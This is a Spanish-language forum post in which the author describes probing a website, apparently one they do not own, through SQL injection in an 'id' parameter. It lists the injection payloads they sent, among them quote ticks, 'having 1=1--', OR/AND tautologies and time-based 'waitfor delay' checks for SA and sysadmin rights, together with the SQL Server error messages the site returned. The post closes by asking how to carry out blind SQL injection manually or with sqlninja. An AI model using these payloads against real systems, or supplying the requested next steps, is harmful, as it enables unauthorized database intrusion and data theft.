Autor
Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido
la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm
##############
# Inserting a tick #
##############
id='
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.
/lib/class/ListaProducto.asp, line 54
#########################
# Identify a valid page #
#########################
id=10
Returns a valid page
################################
# Insert tick after valid page #
################################
id=10'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.
/lib/class/ListaProducto.asp, line 54
###############################
# Tried to enum db table/column name #
###############################
Attempt with the tick
id=10' having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'.
/lib/class/ListaProducto.asp, line 54
Attempt without the tick
Returns the following error:
id=10 having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'.
/lib/class/ListaProducto.asp, line 54
##################################
# Tried the AND 1=1-- and the OR 1=1-- #
##################################
Trying the AND 1=1--
id=10 AND 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'.
/lib/class/ListaProducto.asp, line 54
Trying the OR 1=1--
id=10 or 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'.
/lib/class/ListaProducto.asp, line 54
Then tried them with the ticks
id=10' AND 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'.
/lib/class/ListaProducto.asp, line 54
id=10' OR 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'.
/lib/class/ListaProducto.asp, line 54
Trying to determine if the DB is running as SA
id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Returned page immediately so we know it's NOT running as SA
Trying to determine if it is a member of the SysAdmin group
id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Returned page immediately so we know it's NOT a member of the SysAdmin group
**
Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ?
desde ya muchas gracias ..
En línea
[/url]
